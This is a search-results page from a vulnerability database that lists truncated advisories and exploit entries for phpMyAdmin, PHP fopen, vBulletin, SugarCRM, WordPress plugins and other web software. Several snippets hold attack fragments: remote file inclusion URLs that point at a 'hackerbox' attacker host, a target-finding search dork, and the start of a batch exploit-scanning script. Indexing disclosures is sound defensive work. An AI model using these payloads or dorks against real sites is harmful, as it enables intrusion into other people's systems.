Lucene search

139 matches found

OSV
added 2016/12/11 2:59 a.m. | 1 views

DEBIAN-CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

CVSS 5.3 | AI score 5.6 | EPSS 0.00589
Exploits: 0 | References: 1
OSV
added 2016/12/11 2:59 a.m. | 0 views

UBUNTU-CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

CVSS 5.3 | AI score 6.5 | EPSS 0.00589
Exploits: 0 | References: 3
Prion
added 2016/12/11 2:59 a.m. | 18 views

Path traversal

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

CVSS 5 | AI score 6.9 | EPSS 0.00589
Exploits: 0 | References: 3 | Affected Software: 1
Debian CVE
added 2016/12/11 2:0 a.m. | 21 views

CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

CVSS 5.3 | AI score 5.6 | EPSS 0.00589
Exploits: 0
AlpineLinux
added 2016/12/11 2:0 a.m. | 26 views

CVE-2016-9853

An issue was discovered in phpMyAdmin. By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. During an execution timeout in the expo...

CVSS 5.3 | AI score 5.6 | EPSS 0.00589
Exploits: 0
CNVD
added 2016/09/07 12:0 a.m. | 2 views

PHP 'fopen_wrappers.c' Integer Overflow Vulnerability

PHP is a new language for writing CGI programs. An integer overflow vulnerability exists in PHP 'fopen_wrappers.c'. An attacker could be allowed to exploit this vulnerability to execute arbitrary code in the context of a user's affected application, or a failed attack would result in a denial of...

CVSS 8.1 | AI score 7.9 | EPSS 0.00731
Exploits: 1 | References: 1
seebug.org
added 2016/08/09 12:0 a.m. | 45 views

VBULLETIN 5.2.0/5.2.1/5.2.2 MEDIA UPLOAD SSRF PRIVILEGE ESCALATION

Author: c1tas, p0wd3r know Chong Yu 404 security lab CVE: CVE-2016-6483 A vulnerability overview vBulletin accepts the url parameters, it is not prohibited to jump transduction induced SSRF vBulletin need this function to access external connections, but this limit is not strict cause can trigger...

CVSS 5 | AI score 8.4 | EPSS 0.16262
Exploits: 6
Packet Storm
added 2016/07/25 12:0 a.m. | 317 views

PHP File Vault 0.9 Directory Traversal / File Read

PHP File Vault version 0.9, remote directory traversal and read file vulnerability. Discovered by NA, NAattutanota.com. Description: A very small PHP website...

AI score 0.5
Exploits: 0
Packet Storm
added 2016/06/24 12:0 a.m. | 29 views

SugarCRM 6.5.18 fopen() Command Injection / XSS / SSRF

SugarCRM generateTitle; User input passed through the "typemodule" request parameter isn’t properly sanitized before being used to instantiate a new DashletRssFeedTitle object, and this could be exploited to carry out...

AI score 0.1
Exploits: 0
Exploit DB
added 2015/12/08 12:0 a.m. | 59 views

PHP Utility Belt - Remote Code Execution

Exploit Title : PHP utility belt Remote Code Execution vulnerability Author : WICS Date : 8/12/2015 Software Link : https://github.com/mboynes/php-utility-belt Overview: PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. ajax.php is...

AI score 7.4
Exploits: 0
RedhatCVE
added 2015/10/30 9:34 a.m. | 19 views

CVE-2007-0448

The fopen function in PHP 5.2.0 does not properly handle invalid URI handlers, which allows context-dependent attackers to bypass safe_mode restrictions and read arbitrary files via a file path specified with an invalid URI, as demonstrated via the srpath URI...

CVSS 10 | AI score 7.3 | EPSS 0.0276
Exploits: 1 | References: 2
0day.today
added 2015/08/20 12:0 a.m. | 35 views

up.time 7.5.0 Upload And Execute File Exploit

Exploit for php platform in category web applications up.time 7.5.0 Upload And Execute File Exploit Vendor: Idera Inc. Product web page: http://www.uptimesoftware.com Affected version: 7.5.0 build 16 and 7.4.0 build 13 Summary: The next-generation of IT monitoring software. Desc: up.time suffers...

AI score 7.1
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 14 views

Webboard <= 2.90 beta - Remote File Disclosure Vulnerability

No description provided by source. Webboard = v.2.90 beta Remote File Disclosure Vulnerability. Author: MrDoug. Email: mrdoug13 at gmail dot com. Greetz to all my friends. There...

AI score 7.1
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 16 views

phpWebLog <= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

AI score 7.1
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 8 views

Sports PHool <= 1.0 - Remote File Include Exploit

No description provided by source. ?php / Sports PHool = 1.0 Remote File Include Exploit Found and c0ded by cr4wl3r @hackb0x d0rk: no d0rk f0r kiddi0ts Script: http://sourceforge.net/projects/sportsphool/files/ usage: target: http://target/sportsphool/includes/layout/plain.footer.php?mainnav= evi...

AI score 7.1
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 29 views

webERP <= 4.08.1 - Local/Remote File Inclusion Vulnerability

No description provided by source. Discovered by dun \ posdubatgmail.com 2012-06-27 webERP = 4.08.1 Local/Remote File Inclusion Vulnerability Script: Accounting & Best...

AI score 7.1
Exploits: 0
seebug.org
added 2014/07/01 12:0 a.m. | 43 views

Xorg 1.4 to 1.11.2 File Permission Change PoC

No description provided by source. / xchmod.c -- Xorg file permission change vulnerability PoC Author: vladz http://vladz.devzero.fr Date: 2011/12/15 Software: www.x.org Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USECHMOD preprocessor identifier Test...

CVSS 4.6 | AI score 6.3 | EPSS 0.00866
Exploits: 5
seebug.org
added 2013/10/09 12:0 a.m. | 17 views

WordPress Woopra plugin remote PHP arbitrary code execution exploit.

No description provided by source. Exploit Title: woopra plugins execute arbitrary PHP code Exploit Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/ Date: 06-10-2013 Exploit Author: wantexz Vendor Homepage:wordpress.org/plugins/woopra/ Software Link:...

AI score 7.1
Exploits: 0
Tenable Nessus
added 2012/09/06 12:0 a.m. | 18 views

Mandrake Linux Security Advisory : xpdf (MDKSA-2000:041-1)

There is a potential race condition when using tmpnam and fopen in xpdf versions prior to 0.91. This exploit can be only used as root to overwrite arbitrary files if a symlink is created between the calls to tmpname and fopen. There is also a problem with malicious URL-type links in PDF documents...

AI score 6
Exploits: 0
myhack58
added 2012/03/03 12:0 a.m. | 98 views

phpcms-exp 0day-vulnerability warning-the black bar safety net

Reprinted from dis9.com ---------------------- ? php errorreportingEERROR; settimelimit0; $keyword=’inurl:about/joinus’ ; // batch keywords $timeout = 1; $stratpage = 1; $lastpage = 1 0 0 0 0 0 0 0; for $i=$stratpage ; $i=$lastpage ; $i++ $array=ReadBaiduList$keyword,$timeout,$i; foreach $array a...

AI score 7.2
Exploits: 0